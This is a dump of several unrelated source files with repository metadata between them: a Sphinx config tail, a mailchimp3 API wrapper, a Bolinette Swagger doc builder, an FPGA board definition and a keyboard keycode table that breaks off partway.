# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-maat', u'Django-maat Documentation',
[u'Germano Guerrini'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Django-maat', u'Django-maat Documentation',
u'Germano Guerrini', 'Django-maat', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 31.640927
| 79
| 0.718121
|
4a0f16d9e14d6eb4716eab018414b76fe30b9723
| 1,221
|
py
|
Python
|
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | null | null | null |
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | null | null | null |
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | 1
|
2022-02-12T11:32:46.000Z
|
2022-02-12T11:32:46.000Z
|
from mailchimp3.baseapi import BaseApi
class Member(BaseApi):
def __init__(self, *args, **kwargs):
super(Member, self).__init__(*args, **kwargs)
self.endpoint = 'lists'
def all(self, list_id):
"""
returns the first 10 members for a specific list.
"""
return self._mc_client._get(url=self._build_path(list_id, 'members'))
def get(self, list_id, member_id):
"""
returns the specified list member.
"""
return self._mc_client._get(url=self._build_path(list_id, 'members', member_id))
def update(self, list_id, member_id, data):
"""
updates an existing list member.
"""
return self._mc_client._patch(url=self._build_path(list_id, 'members', member_id), data=data)
def delete(self, list_id, member_id):
"""
removes an existing list member from the list. This cannot be undone.
"""
return self._mc_client._delete(url=self._build_path(list_id, 'members', member_id))
def create(self, list_id, data):
"""
adds a new member to the list.
"""
return self._mc_client._post(url=self._build_path(list_id, 'members'), data=data)
| 31.307692
| 101
| 0.622441
|
4a0f17f9ed80eae094f5c320634aeec09cd27be1
| 10,171
|
py
|
Python
|
bolinette/web/docs.py
|
TheCaptainCat/flasque
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | 3
|
2019-10-25T12:21:28.000Z
|
2020-09-11T13:43:32.000Z
|
bolinette/web/docs.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
bolinette/web/docs.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
import re
from typing import Any, Literal
import yaml
from aiohttp import web as aio_web
from aiohttp_swagger import setup_swagger
from bolinette import types
from bolinette.core import abc, BolinetteContext
from bolinette.data import DataContext, WithDataContext, mapping
from bolinette.web import (
ext,
WebContext,
WithWebContext,
Controller,
ControllerRoute,
ControllerMetadata,
HttpMethod,
)
from bolinette.utils import paths, files
class Documentation(abc.WithContext, WithDataContext, WithWebContext):
def __init__(
self, context: BolinetteContext, data_ctx: DataContext, web_ctx: WebContext
):
abc.WithContext.__init__(self, context)
WithDataContext.__init__(self, data_ctx)
WithWebContext.__init__(self, web_ctx)
self.swagger_path = self.context.instance_path("swagger.yaml")
self._path_param_regex = re.compile(r"{([^}]*)}")
self._response_regex = re.compile(
r"^-response ([\d]{3})(?: ([^:]*))?(?:: ?(.*))?$"
)
self._response_type_regex = re.compile(r"file\[([^]]*)]")
self._response_returns_regex = re.compile(r"returns")
self._type_map = {
types.db.Integer: {"type": "integer"},
types.db.Boolean: {"type": "boolean"},
types.db.String: {"type": "string"},
types.db.Email: {"type": "string", "format": "email"},
types.db.Float: {"type": "number", "format": "float"},
types.db.Date: {"type": "string", "format": "date-time"},
types.db.Password: {"type": "string", "format": "password"},
}
def build(self):
self.context.logger.info("Building API documentation")
content = {
"openapi": "3.0.0",
"info": {
"title": self.context.manifest.get("name", "Bolinette App"),
"description": self.context.manifest.get(
"desc", "My web app built with the Bolinette framework"
),
"version": self.context.manifest.get("version", "0.0.1"),
},
"servers": [
{"url": f'http://localhost:{self.context.env.get("port", 5000)}'}
],
"paths": self._build_routes(),
"components": {"schemas": self._build_schemas()},
}
files.write(self.swagger_path, yaml.safe_dump(content))
def _build_routes(self):
routes = {}
for path, method, route in self.__web_ctx__.resources.routes:
self._build_route(path, method, route, routes)
return routes
def _build_route(
self,
path: str,
method: HttpMethod,
route: ControllerRoute,
routes: dict[str, Any],
):
if route.controller is not None:
if not path:
path = "/"
if path not in routes:
routes[path] = {}
docs: dict[str, Any] = {
"tags": [f"{route.controller.__blnt__.name} controller"]
}
parsed_docs = self._parse_docs(route.docstring, route)
if len(parsed_docs) > 0:
docs.update(parsed_docs)
if (
"responses" not in docs or len(docs["responses"]) <= 0
) and route.returns:
if "responses" not in docs:
docs["responses"] = {}
ref = self._build_ref(route, "response")
if len(ref) > 0:
docs["responses"][200] = {
"content": {"application/json": {"schema": ref}}
}
parameters = self._parse_path(path)
if len(parameters) > 0:
docs["parameters"] = parameters
routes[path][method.name.lower()] = docs
if route.inner_route is not None:
self._build_route(path, method, route.inner_route, routes)
def _parse_docs(self, docstring: str | None, route: ControllerRoute):
if not docstring:
return {}
docs: dict[str, Any] = {}
parsed = [s.strip("\n ") for s in docstring.split("\n\n")]
doc_index = 0
for part in parsed:
self._parse_doc_line(part, docs, doc_index, route)
doc_index += 1
return docs
def _parse_doc_line(
self, part: str, docs: dict[str, Any], index: int, route: ControllerRoute
):
if index == 0:
docs["summary"] = part
return
if part.startswith("-"):
lines = [line.strip() for line in part.split("\n")]
commands = []
for line in lines:
if line.startswith("-"):
commands.append(line)
else:
commands[-1] += f" {line}"
for command in commands:
if command.startswith("-response"):
self._parse_responses(command, docs, route)
return
if "description" not in docs:
docs["description"] = ""
if len(docs["description"]) > 0:
docs["description"] += "\n\n"
docs["description"] += part
def _parse_responses(self, text: str, docs: dict[str, Any], route: ControllerRoute):
if (match := self._response_regex.match(text)) is not None:
code = match.group(1)
res_type = match.group(2)
text = match.group(3)
if "responses" not in docs:
docs["responses"] = {}
response: dict[str, Any] = {}
if text:
response["description"] = text
if res_type:
if self._response_returns_regex.match(res_type) is not None:
ref = self._build_ref(route, "response")
if len(ref) > 0:
response["content"] = {"application/json": {"schema": ref}}
elif (match := self._response_type_regex.match(res_type)) is not None:
if mime := match.group(1):
response["content"] = {mime: {"schema": {"type": "string"}}}
if len(response) > 0:
docs["responses"][code] = response
@staticmethod
def _build_ref(route: ControllerRoute, schema_type: Literal["response", "payload"]):
returns = route.returns
if returns:
ref = {
"$ref": f"#/components/schemas/{schema_type}.{returns.model}.{returns.key}"
}
if returns.as_list:
return {"type": "array", "items": ref}
return ref
return {}
def _parse_path(self, path: str):
parameters = []
for match in self._path_param_regex.finditer(path):
param, *args = match.group(1).split(":")
parameters.append({"name": param, "in": "path", "required": True})
return parameters
def _build_schemas(self):
schemas = {}
collections = {
"payloads": self.__data_ctx__.mapper.payloads,
"response": self.__data_ctx__.mapper.responses,
}
include_defs = {"payloads": False, "response": True}
include_fks = {"payloads": True, "response": False}
for def_type, collection in collections.items():
inc_defs = include_defs[def_type]
inc_fks = include_fks[def_type]
for model, key, definition in collection:
properties = {}
for field in definition.fields:
if isinstance(field, mapping.Field):
properties[field.name] = self._type_map[field.type]
elif isinstance(field, mapping.Definition):
if inc_defs:
properties[field.name] = {
"$ref": f"#/components/schemas/{def_type}.{field.model_name}.{field.model_key}"
}
if inc_fks and isinstance(field, mapping.Reference):
properties[field.foreign_key] = {"type": "int"}
elif isinstance(field, mapping.List) and inc_defs:
elem = field.element
if isinstance(elem, mapping.Definition):
properties[field.name] = {
"type": "array",
"items": {
"$ref": f"#/components/schemas/{def_type}.{elem.model_name}.{elem.model_key}"
},
}
schema = {"type": "object", "properties": properties}
schemas[f"{def_type}.{model}.{key}"] = schema
return schemas
def setup(self):
if paths.exists(self.swagger_path):
setup_swagger(
self.context.registry.get(aio_web.Application),
swagger_url="/api",
ui_version=3,
swagger_from_file=self.swagger_path,
)
else:
context = self.context
web_ctx = self.context.registry.get(WebContext)
no_docs_ctrl = NoDocsController(context, web_ctx)
no_docs_route: ControllerRoute = no_docs_ctrl.get_no_docs.instantiate(
controller=no_docs_ctrl, context=context, web_ctx=web_ctx
)
no_docs_route.setup()
class NoDocsController(Controller):
__blnt__ = ControllerMetadata("no_docs", "", False, "", "/api", [])
def __init__(self, context: BolinetteContext, web_ctx: WebContext):
super().__init__(context, web_ctx)
@ext.route.get("")
async def get_no_docs(self):
params = {
"name": self.context.manifest.get("name", "Bolinette App"),
"desc": self.context.manifest.get(
"desc", "My web app built with the Bolinette framework"
),
"version": self.context.manifest.get("version", "0.0.1"),
}
return self.response.render_template(
"no_docs.html.jinja2", params, self.context.internal_files_path("templates")
)
| 40.043307
| 113
| 0.530135
|
4a0f1938cb075880aadfd70a2bed774ec09b3550
| 8,650
|
py
|
Python
|
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
from nmigen.build import Resource, Subsignal, Pins, PinsN, Attrs, Clock, DiffPairs, Connector
from nmigen.vendor.intel import IntelPlatform
__all__ = ["DaishoPlatform"]
def ULPIResource(name, data_sites, clk_site, dir_site, nxt_site, stp_site, reset_site):
""" Generates a set of resources for a ULPI-connected USB PHY. """
return Resource(name, 0,
Subsignal("data", Pins(data_sites, dir="io")),
Subsignal("clk", Pins(clk_site, dir="o" )),
Subsignal("dir", Pins(dir_site, dir="i" )),
Subsignal("nxt", Pins(nxt_site, dir="i" )),
Subsignal("stp", Pins(stp_site, dir="o" )),
Subsignal("rst", PinsN(reset_site, dir="o" )),
Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")
)
class DaishoPlatform(IntelPlatform):
""" Board description for Daisho boards."""
name = "Daisho"
device = "EEP4CE30F29C8"
default_clk = "clk_60MHz"
#
# Default clock frequencies for each of our clock domains.
#
# Different revisions have different FPGA speed grades, and thus the
# default frequencies will vary.
#
DEFAULT_CLOCK_FREQUENCIES_MHZ = {
"fast": 120,
"sync": 60,
"ulpi": 60
}
#
# Preferred DRAM bus I/O (de)-skewing constants.
#
ram_timings = dict(
clock_skew = 64
)
# Provides any platform-specific ULPI registers necessary.
# This is the spot to put any platform-specific vendor registers that need
# to be written.
ulpi_extra_registers = {
0x39: 0b000110 # USB3343: swap D+ and D- to match the LUNA boards
}
#
# I/O resources.
#
resources = [
# Primary, discrete 60MHz oscillator.
Resource("clk_60MHz", 0, Pins("A8", dir="i"),
Clock(60e6), Attrs(IO_TYPE="LVCMOS33")),
# Connection to our SPI flash; can be used to work with the flash
# from e.g. a bootloader.
Resource("spi_flash", 0,
# SCK is on pin 9; but doesn't have a traditional I/O buffer.
# Instead, we'll need to drive a clock into a USRMCLK instance.
# See interfaces/flash.py for more information.
Subsignal("sdi", Pins("T8", dir="o")),
Subsignal("sdo", Pins("T7", dir="i")),
# In r0.1, the chip select line can either be driven by the FPGA
# or by the Debug Controller. Accordingly, we'll mark the line as
# bidirectional, and let the user decide.
Subsignal("cs", PinsN("N8", dir="io")),
Attrs(IO_TYPE="LVCMOS33")
),
#
# Note: r0.1 has a DFM issue that makes it difficult to solder a BGA with
# reliable connections on the intended SCK pin (P12), and lacks a CS pin on the
# debug SPI; which seems like a silly omission.
#
# Accordingly, we're mapping the debug SPI and UART over the same pins, as the
# microcontroller can use either.
#
# UART connected to the debug controller; can be routed to a host via CDC-ACM.
Resource("uart", 0,
Subsignal("rx", Pins("R14", dir="i")),
Subsignal("tx", Pins("T14", dir="o")),
Attrs(IO_TYPE="LVCMOS33")
),
# SPI bus connected to the debug controller, for simple register exchanges.
# Note that the Debug Controller is the master on this bus.
Resource("debug_spi", 0,
Subsignal("sck", Pins( "R14", dir="i")),
Subsignal("sdi", Pins( "P13", dir="i")),
Subsignal("sdo", Pins( "P11", dir="o")),
Subsignal("cs", PinsN("T14", dir="i")),
Attrs(IO_TYPE="LVCMOS33")
),
# FPGA-connected LEDs.
Resource("led", 5, PinsN("P15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("led", 4, PinsN("N16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("led", 3, PinsN("M15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("led", 2, PinsN("M16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("led", 1, PinsN("L15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("led", 0, PinsN("L16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
# USB PHYs
ULPIResource("sideband_phy",
data_sites="R2 R1 P2 P1 N1 M2 M1 L2", clk_site="R4",
dir_site="T3", nxt_site="T2", stp_site="T4", reset_site="R3"),
ULPIResource("host_phy",
data_sites="G2 G1 F2 F1 E1 D1 C1 B1", clk_site="K2",
dir_site="J1", nxt_site="H2", stp_site="J2", reset_site="K1"),
ULPIResource("target_phy",
data_sites="D16 E15 E16 F15 F16 G15 J16 K16", clk_site="B15",
dir_site="C15", nxt_site="C16", stp_site="B16", reset_site="G16"),
# Target port power switching
# Note: the r0.1 boards that have been produced incorrectly use the AP22814B
# instead of the AP22814A. This inverts the load-switch enables.
#
Resource("power_a_port", 0, PinsN("C14", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("pass_through_vbus", 0, PinsN("D14", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
Resource("target_vbus_fault", 0, Pins("K15", dir="i"), Attrs(IO_TYPE="LVCMOS33")),
# HyperRAM (1V8 domain).
Resource("ram", 0,
# Note: our clock uses the pseudo-differential I/O present on the top tiles.
# This requires a recent version of trellis+nextpnr. If your build complains
# that LVCMOS18D is an invalid I/O type, you'll need to upgrade.
Subsignal("clk", DiffPairs("B14", "A15", dir="o"), Attrs(IO_TYPE="LVCMOS18D")),
Subsignal("dq", Pins("A11 B10 B12 A12 B11 A10 B9 A9", dir="io")),
Subsignal("rwds", Pins( "A13", dir="io")),
Subsignal("cs", PinsN("A14", dir="o")),
Subsignal("reset", PinsN("B13", dir="o")),
Attrs(IO_TYPE="LVCMOS18", SLEWRATE="FAST")
),
# User I/O connections.
Resource("user_io", 0, Pins("A5", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
Resource("user_io", 1, Pins("A4", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
Resource("user_io", 2, Pins("A3", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
Resource("user_io", 3, Pins("A2", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
]
connectors = [
# User I/O connector.
Connector("user_io", 0, """
A5 - A2
A4 - A3
""")
]
def toolchain_prepare(self, fragment, name, **kwargs):
overrides = {
'ecppack_opts': '--compress --idcode {} --freq 38.8'.format(0x21111043)
}
return super().toolchain_prepare(fragment, name, **overrides, **kwargs)
def toolchain_program(self, products, name):
""" Programs the relevant LUNA board via its sideband connection. """
from luna.apollo import ApolloDebugger
from luna.apollo.ecp5 import ECP5_JTAGProgrammer
# Create our connection to the debug module.
debugger = ApolloDebugger()
# Grab our generated bitstream, and upload it to the FPGA.
bitstream = products.get("{}.bit".format(name))
with debugger.jtag as jtag:
programmer = ECP5_JTAGProgrammer(jtag)
programmer.configure(bitstream)
def toolchain_flash(self, products, name="top"):
""" Programs the LUNA board's flash via its sideband connection. """
from luna.apollo import ApolloDebugger
from luna.apollo.flash import ensure_flash_gateware_loaded
# Create our connection to the debug module.
debugger = ApolloDebugger()
ensure_flash_gateware_loaded(debugger, platform=self.__class__())
# Grab our generated bitstream, and upload it to the .
bitstream = products.get("{}.bit".format(name))
with debugger.flash as flash:
flash.program(bitstream)
debugger.soft_reset()
def toolchain_erase(self):
""" Erases the LUNA board's flash. """
from luna.apollo import ApolloDebugger
from luna.apollo.flash import ensure_flash_gateware_loaded
# Create our connection to the debug module.
debugger = ApolloDebugger()
ensure_flash_gateware_loaded(debugger, platform=self.__class__())
with debugger.flash as flash:
flash.erase()
debugger.soft_reset()
| 37.445887
| 97
| 0.594798
|
4a0f19555db352f34e86bac86f2a04e349d7da48
| 16,262
|
py
|
Python
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 439
|
2020-05-02T03:47:55.000Z
|
2022-03-27T14:42:54.000Z
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 34
|
2020-07-12T15:53:06.000Z
|
2022-03-18T08:38:18.000Z
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 48
|
2020-05-18T15:41:22.000Z
|
2022-03-12T06:44:48.000Z
|
# -*- coding: utf-8 -*-
#
# reference:
# + https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2
#
# fmt: off
NO = '\x00'
TRANSPARENT = '\x01'
# NONE = 0x00 # No key pressed
# Keyboard Error Roll Over - used for all slots if too many keys are pressed ("Phantom key")
# ROLLOVER = 0x01
# 0x02 # Keyboard POST Fail
# 0x03 # Keyboard Error Undefined
# A = 0x04 # Keyboard a and A
# B = 0x05 # Keyboard b and B
# C = 0x06 # Keyboard c and C
# D = 0x07 # Keyboard d and D
# E = 0x08 # Keyboard e and E
# F = 0x09 # Keyboard f and F
# G = 0x0a # Keyboard g and G
# H = 0x0b # Keyboard h and H
# I = 0x0c # Keyboard i and I
# J = 0x0d # Keyboard j and J
# K = 0x0e # Keyboard k and K
# L = 0x0f # Keyboard l and L
# M = 0x10 # Keyboard m and M
# N = 0x11 # Keyboard n and N
# O = 0x12 # Keyboard o and O
# P = 0x13 # Keyboard p and P
# Q = 0x14 # Keyboard q and Q
# R = 0x15 # Keyboard r and R
# S = 0x16 # Keyboard s and S
# T = 0x17 # Keyboard t and T
# U = 0x18 # Keyboard u and U
# V = 0x19 # Keyboard v and V
# W = 0x1a # Keyboard w and W
# X = 0x1b # Keyboard x and X
# Y = 0x1c # Keyboard y and Y
# Z = 0x1d # Keyboard z and Z
A = 'a'
B = 'b'
C = 'c'
D = 'd'
E = 'e'
F = 'f'
G = 'g'
H = 'h'
I = 'i'
J = 'j'
K = 'k'
L = 'l'
M = 'm'
N = 'n'
O = 'o'
P = 'p'
Q = 'q'
R = 'r'
S = 's'
T = 't'
U = 'u'
V = 'v'
W = 'w'
X = 'x'
Y = 'y'
Z = 'z'
# 1 = 0x1e # Keyboard 1 and !
# 2 = 0x1f # Keyboard 2 and @
# 3 = 0x20 # Keyboard 3 and #
# 4 = 0x21 # Keyboard 4 and $
# 5 = 0x22 # Keyboard 5 and %
# 6 = 0x23 # Keyboard 6 and ^
# 7 = 0x24 # Keyboard 7 and &
# 8 = 0x25 # Keyboard 8 and *
# 9 = 0x26 # Keyboard 9 and (
# 0 = 0x27 # Keyboard 0 and )
ENTER = 0x28 # Keyboard Return (ENTER)
ESCAPE = 0x29 # Keyboard ESCAPE
ESC = ESCAPE
BACKSPACE = 0x2a # Keyboard DELETE (Backspace)
TAB = 0x2b # Keyboard Tab
SPACE = 0x2c # Keyboard Spacebar
MINUS = 0x2d # Keyboard - and _
EQUAL = 0x2e # Keyboard = and +
LEFTBRACE = 0x2f # Keyboard [ and {
RIGHTBRACE = 0x30 # Keyboard ] and }
BACKSLASH = 0x31 # Keyboard \ and |
HASHTILDE = 0x32 # Keyboard Non-US # and ~
SEMICOLON = 0x33 # Keyboard ; and :
APOSTROPHE = 0x34 # Keyboard ' and "
QUOTE = 0x34
GRAVE = 0x35 # Keyboard ` and ~
COMMA = 0x36 # Keyboard , and <
DOT = 0x37 # Keyboard . and >
SLASH = 0x38 # Keyboard / and ?
CAPSLOCK = 0x39 # Keyboard Caps Lock
CAPS = CAPSLOCK
F1 = 0x3a # Keyboard F1
F2 = 0x3b # Keyboard F2
F3 = 0x3c # Keyboard F3
F4 = 0x3d # Keyboard F4
F5 = 0x3e # Keyboard F5
F6 = 0x3f # Keyboard F6
F7 = 0x40 # Keyboard F7
F8 = 0x41 # Keyboard F8
F9 = 0x42 # Keyboard F9
F10 = 0x43 # Keyboard F10
F11 = 0x44 # Keyboard F11
F12 = 0x45 # Keyboard F12
PRINTSCREEN = 0x46 # Keyboard Print Screen
PRTSCN = PRINTSCREEN
SCROLLLOCK = 0x47 # Keyboard Scroll Lock
PAUSE = 0x48 # Keyboard Pause
INSERT = 0x49 # Keyboard Insert
HOME = 0x4a # Keyboard Home
PAGEUP = 0x4b # Keyboard Page Up
PGUP = PAGEUP
DELETE = 0x4c # Keyboard Delete Forward
DEL = DELETE
END = 0x4d # Keyboard End
PAGEDOWN = 0x4e # Keyboard Page Down
PGDN = PAGEDOWN
RIGHT = 0x4f # Keyboard Right Arrow
LEFT = 0x50 # Keyboard Left Arrow
DOWN = 0x51 # Keyboard Down Arrow
UP = 0x52 # Keyboard Up Arrow
NUMLOCK = 0x53 # Keyboard Num Lock and Clear
KPSLASH = 0x54 # Keypad /
KPASTERISK = 0x55 # Keypad *
KPMINUS = 0x56 # Keypad -
KPPLUS = 0x57 # Keypad +
KPENTER = 0x58 # Keypad ENTER
KP1 = 0x59 # Keypad 1 and End
KP2 = 0x5a # Keypad 2 and Down Arrow
KP3 = 0x5b # Keypad 3 and PageDn
KP4 = 0x5c # Keypad 4 and Left Arrow
KP5 = 0x5d # Keypad 5
KP6 = 0x5e # Keypad 6 and Right Arrow
KP7 = 0x5f # Keypad 7 and Home
KP8 = 0x60 # Keypad 8 and Up Arrow
KP9 = 0x61 # Keypad 9 and Page Up
KP0 = 0x62 # Keypad 0 and Insert
KPDOT = 0x63 # Keypad . and Delete
# 102ND = 0x64 # Keyboard Non-US \ and |
APPLICATION = 0x65 # Keyboard Application
MENU = APPLICATION
POWER = 0x66 # Keyboard Power
KPEQUAL = 0x67 # Keypad =
F13 = 0x68 # Keyboard F13
F14 = 0x69 # Keyboard F14
F15 = 0x6a # Keyboard F15
F16 = 0x6b # Keyboard F16
F17 = 0x6c # Keyboard F17
F18 = 0x6d # Keyboard F18
F19 = 0x6e # Keyboard F19
F20 = 0x6f # Keyboard F20
F21 = 0x70 # Keyboard F21
F22 = 0x71 # Keyboard F22
F23 = 0x72 # Keyboard F23
F24 = 0x73 # Keyboard F24
OPEN = 0x74 # Keyboard Execute
HELP = 0x75 # Keyboard Help
# PROPS = 0x76 # Keyboard Menu
SELECT = 0x77 # Keyboard Select
STOP = 0x78 # Keyboard Stop
AGAIN = 0x79 # Keyboard Again
UNDO = 0x7a # Keyboard Undo
CUT = 0x7b # Keyboard Cut
COPY = 0x7c # Keyboard Copy
PASTE = 0x7d # Keyboard Paste
FIND = 0x7e # Keyboard Find
MUTE = 0x7f # Keyboard Mute
# VOLUMEUP = 0x80 # Keyboard Volume Up
# VOLUMEDOWN = 0x81 # Keyboard Volume Down
# 0x82 Keyboard Locking Caps Lock
# 0x83 Keyboard Locking Num Lock
# 0x84 Keyboard Locking Scroll Lock
KPCOMMA = 0x85 # Keypad Comma
# 0x86 Keypad Equal Sign
INT1 = 0x87
INT2 = 0x88
INT3 = 0x89
INT4 = 0x8a
INT5 = 0x8b
INT6 = 0x8c
INT7 = 0x8d
INT8 = 0x8e
INT9 = 0x8f
RO = 0x87 # Keyboard International1
KATAKANAHIRAGANA = 0x88 # Keyboard International2
YEN = 0x89 # Keyboard International3
HENKAN = 0x8a # Keyboard International4
MUHENKAN = 0x8b # Keyboard International5
KPJPCOMMA = 0x8c # Keyboard International6
# 0x8d Keyboard International7
# 0x8e Keyboard International8
# 0x8f Keyboard International9
LANG1 = 0x90
LANG2 = 0x91
LANG3 = 0x92
LANG4 = 0x93
LANG5 = 0x94
LANG6 = 0x95
LANG7 = 0x96
LANG8 = 0x97
LANG9 = 0x98
HANGEUL = 0x90 # Keyboard LANG1
HANJA = 0x91 # Keyboard LANG2
KATAKANA = 0x92 # Keyboard LANG3
HIRAGANA = 0x93 # Keyboard LANG4
ZENKAKUHANKAKU = 0x94 # Keyboard LANG5
# 0x95 Keyboard LANG6
# 0x96 Keyboard LANG7
# 0x97 Keyboard LANG8
# 0x98 Keyboard LANG9
# 0x99 Keyboard Alternate Erase
# 0x9a Keyboard SysReq/Attention
# 0x9b Keyboard Cancel
# 0x9c Keyboard Clear
# 0x9d Keyboard Prior
# 0x9e Keyboard Return
# 0x9f Keyboard Separator
# 0xa0 Keyboard Out
# 0xa1 Keyboard Oper
# 0xa2 Keyboard Clear/Again
# 0xa3 Keyboard CrSel/Props
# 0xa4 Keyboard ExSel
# 0xb0 Keypad 00
# 0xb1 Keypad 000
# 0xb2 Thousands Separator
# 0xb3 Decimal Separator
# 0xb4 Currency Unit
# 0xb5 Currency Sub-unit
KPLEFTPAREN = 0xb6 # Keypad (
KPRIGHTPAREN = 0xb7 # Keypad )
# 0xb8 Keypad {
# 0xb9 Keypad }
# 0xba Keypad Tab
# 0xbb Keypad Backspace
# 0xbc Keypad A
# 0xbd Keypad B
# 0xbe Keypad C
# 0xbf Keypad D
# 0xc0 Keypad E
# 0xc1 Keypad F
# 0xc2 Keypad XOR
# 0xc3 Keypad ^
# 0xc4 Keypad %
# 0xc5 Keypad <
# 0xc6 Keypad >
# 0xc7 Keypad &
# 0xc8 Keypad &&
# 0xc9 Keypad |
# 0xca Keypad ||
# 0xcb Keypad :
# 0xcc Keypad #
# 0xcd Keypad Space
# 0xce Keypad @
# 0xcf Keypad !
# 0xd0 Keypad Memory Store
# 0xd1 Keypad Memory Recall
# 0xd2 Keypad Memory Clear
# 0xd3 Keypad Memory Add
# 0xd4 Keypad Memory Subtract
# 0xd5 Keypad Memory Multiply
# 0xd6 Keypad Memory Divide
# 0xd7 Keypad +/-
# 0xd8 Keypad Clear
# 0xd9 Keypad Clear Entry
# 0xda Keypad Binary
# 0xdb Keypad Octal
# 0xdc Keypad Decimal
# 0xdd Keypad Hexadecimal
LEFT_CTRL = 0xe0 # Keyboard Left Control
LEFT_SHIFT = 0xe1 # Keyboard Left Shift
LEFT_ALT = 0xe2 # Keyboard Left Alt
LEFT_GUI = 0xe3 # Keyboard Left GUI
RIGHT_CTRL = 0xe4 # Keyboard Right Control
RIGHT_SHIFT = 0xe5 # Keyboard Right Shift
RIGHT_ALT = 0xe6 # Keyboard Right Alt
RIGHT_GUI = 0xe7 # Keyboard Right GUI
LCTRL = LEFT_CTRL
LSHIFT = LEFT_SHIFT
LALT = LEFT_ALT
LGUI = LEFT_GUI
RCTRL = RIGHT_CTRL
RSHIFT = RIGHT_SHIFT
RALT = RIGHT_ALT
RGUI = RIGHT_GUI
CTRL = LEFT_CTRL
SHIFT = LEFT_SHIFT
ALT = LEFT_ALT
GUI = LEFT_GUI
ASCII_TO_KEYCODE = (
b'\x00' # NUL
b'\x01' # SOH as TRANSPARENT
b'\x00' # STX
b'\x00' # ETX
b'\x00' # EOT
b'\x00' # ENQ
b'\x00' # ACK
b'\x00' # BEL \a
b'\x2a' # BS BACKSPACE \b
b'\x2b' # TAB \t
b'\x28' # LF \n RETURN / ENTER
b'\x00' # VT \v
b'\x00' # FF \f
b'\x28' # CR \r as RETURN
b'\x00' # SO
b'\x00' # SI
b'\x00' # DLE
b'\x00' # DC1
b'\x00' # DC2
b'\x00' # DC3
b'\x00' # DC4
b'\x00' # NAK
b'\x00' # SYN
b'\x00' # ETB
b'\x00' # CAN
b'\x00' # EM
b'\x00' # SUB
b'\x29' # ESC
b'\x00' # FS
b'\x00' # GS
b'\x00' # RS
b'\x00' # US
b'\x2c' # SPACE
b'\x9e' # ! (shift 1)
b'\xb4' # ' (shift ')
b'\xa0' # # (shift 3)
b'\xa1' # $ (shift 4)
b'\xa2' # % (shift 5)
b'\xa4' # & (shift 7)
b'\x34' # '
b'\xa6' # ( (shift 9)
b'\xa7' # ) (shift 0)
b'\xa5' # * (shift 8)
b'\xae' # + (shift =)
b'\x36' # ,
b'\x2d' # -
b'\x37' # .
b'\x38' # /
b'\x27' # 0
b'\x1e' # 1
b'\x1f' # 2
b'\x20' # 3
b'\x21' # 4
b'\x22' # 5
b'\x23' # 6
b'\x24' # 7
b'\x25' # 8
b'\x26' # 9
b'\xb3' # : (shift ;)
b'\x33' # ;
b'\xb6' # < (shift ,)
b'\x2e' # =
b'\xb7' # > (shift .)
b'\xb8' # ? (shift /)
b'\x9f' # @ (shift 2)
b'\x84' # A
b'\x85' # B
b'\x86' # C
